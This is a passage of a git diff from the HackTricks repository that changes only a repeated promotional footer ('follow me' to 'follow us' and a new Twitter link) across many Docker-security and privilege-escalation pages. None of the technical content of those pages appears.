HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/README.md b/linux-hardening/privilege-escalation/docker-security/README.md index 28ddcccc2..4776281a1 100644 --- a/linux-hardening/privilege-escalation/docker-security/README.md +++ b/linux-hardening/privilege-escalation/docker-security/README.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -449,7 +449,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md b/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md index b798c29cb..e96a571b4 100644 --- a/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -66,7 +66,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/apparmor.md b/linux-hardening/privilege-escalation/docker-security/apparmor.md index c003413a4..e67d3add8 100644 --- a/linux-hardening/privilege-escalation/docker-security/apparmor.md +++ b/linux-hardening/privilege-escalation/docker-security/apparmor.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -315,7 +315,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md b/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md index 2dcf63ef4..3357d629d 100644 --- a/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md +++ b/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -225,7 +225,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/cgroups.md b/linux-hardening/privilege-escalation/docker-security/cgroups.md index 423128381..bfed62d90 100644 --- a/linux-hardening/privilege-escalation/docker-security/cgroups.md +++ b/linux-hardening/privilege-escalation/docker-security/cgroups.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -108,7 +108,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md index 63434d1dc..0766cc0dc 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -680,7 +680,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md index 757955237..3f62c9116 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -81,7 +81,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md index 80dae83da..5861740c2 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -106,7 +106,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md index c7828ba6f..03def5893 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -163,7 +163,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/README.md b/linux-hardening/privilege-escalation/docker-security/namespaces/README.md index 6bcdee467..79ed96379 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/README.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/README.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -71,7 +71,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md index 9f474a95a..1d39d58c6 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -109,7 +109,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md index 8e6c6fec7..adb562e89 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -120,7 +120,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md index cc08b6e3e..b222577fc 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 